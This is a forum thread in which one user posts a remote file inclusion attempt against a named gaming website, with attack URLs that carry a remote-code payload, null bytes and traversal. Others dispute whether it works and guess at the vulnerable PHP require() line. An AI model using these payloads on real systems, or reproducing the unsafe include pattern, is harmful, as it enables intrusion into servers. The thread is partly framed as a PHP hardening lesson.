[File Inclusion] Eternia Games

10/15/2012 17:40 WarmongerR7#1

Here to show you a little exploit on Eternia's website that would almost allow you to execute any of your own scripts under web server privileges (a shell or whatever) with ease. This is only to show you why you should always turn allow_url_fopen off in your php configuration.

Code:

http://lastchaos.eterniagames.com/s_ep3/?lang=http://site.com/code.txt%00

Which gives us a result of.

Code:

Warning: require(_cache/lang.http://site.com/code.txt) [function.require]: failed to open stream: No such file or directory in /var/www/vhosts/eterniagames.com/subdomains/lastchaos/httpdocs/s_ep3/index.config.php on line 514

If the server permitted traversal we could simply do the following to jump down two directories.

Code:

http://lastchaos.eterniagames.com/s_ep3/?lang=..%2f..%2fhttp://site.com/code.txt%00

And inject our own code into the site. This is for learning purposes only. I suggest not attacking random servers thinking this is going to work, because it wont. This just goes to show some of the biggest servers, aren't always the securest.

10/15/2012 19:58 FapMax#2

This Website "Error" is totally worth it you are WRONG. You cant inject anything there.

The Source looks like this :

PHP Code:


			
require('lang.' . $_GET['lang'] . '.php');

Your Injection Point :

PHP Code:


			
require('lang.INJECTION.php');

You cant paste any Code in there. There is no way to Request other Files except the Files on there own FTP called "lang." at the start.
I found this befor but it does not give any vulnerable point thats why i didnt post it, anyway good work for the Start.

10/15/2012 20:24 WarmongerR8#3

Quote:

Originally Posted by FapMax

This Website "Error" is totally worth it you are WRONG. You cant inject anything there.

The Source looks like this :

PHP Code:

require('lang.' . $_GET['lang'] . '.php');

Your Injection Point :

PHP Code:

require('lang.INJECTION.php');

You cant paste any Code in there. There is no way to Request other Files except the Files on there own FTP called "lang." at the start.
I found this befor but it does not give any vulnerable point thats why i didnt post it, anyway good work for the Start.

You are wrong, this hole isn't abusable because of the parameters existing server side. It would be possible to execute a shell on the web server if it allowed traversal, but it does not (like I explained to you in the first post). This is to teach you how to setup server software properly (i.e. PHP) so you don't end up hacked with a similar hole. Also your injection point is wrong.

Code:

require(_cache/lang.<injection point>%00);

Also the server side code most likely looks like this.

Code:

require($_GET['cache'] . $_GET['lang'] . '.php');

If you have any more questions feel free to ask. If you would like help securing your website/server feel free to pm me, and we will negotiate.

10/15/2012 20:30 Wayne...?#4

Oh Nooo WarmongerR7 Are Banned now WarmongerR8 :facepalm:

This generation will never End :facepalm:

10/15/2012 22:01 FapMax#5

Quote:
Originally Posted by WarmongerR8
You are wrong, this hole isn't abusable because of the parameters existing server side. It would be possible to execute a shell on the web server if it allowed traversal, but it does not (like I explained to you in the first post). This is to teach you how to setup server software properly (i.e. PHP) so you don't end up hacked with a similar hole. Also your injection point is wrong.
Code:
require(_cache/lang.<injection point>%00);
Also the server side code most likely looks like this.
Code:
require($_GET['cache'] . $_GET['lang'] . '.php');
If you have any more questions feel free to ask. If you would like help securing your website/server feel free to pm me, and we will negotiate.

Retard, i loled : "$_GET['cache']" xD
Read [Only registered and activated users can see links. Click Here To Register...] please.

10/15/2012 22:09 WarmongerR8#6

Quote:

Originally Posted by FapMax

Retard, i loled : "$_GET['cache']" xD
Read [Only registered and activated users can see links. Click Here To Register...] please.

PS: Enjoy your Ban.
[Only registered and activated users can see links. Click Here To Register...]

My bad, drunk and high. :bandit: Here is what it should look like.

Code:

require($settings['cache'] . $_GET['lang'] . '.php');

Again, if you have any questions feel free to ask.

Quote:

Originally Posted by FapMax

PS: Enjoy your Ban.
[Only registered and activated users can see links. Click Here To Register...]

I'll be here forever, to teach kiddies like you.
[Only registered and activated users can see links. Click Here To Register...]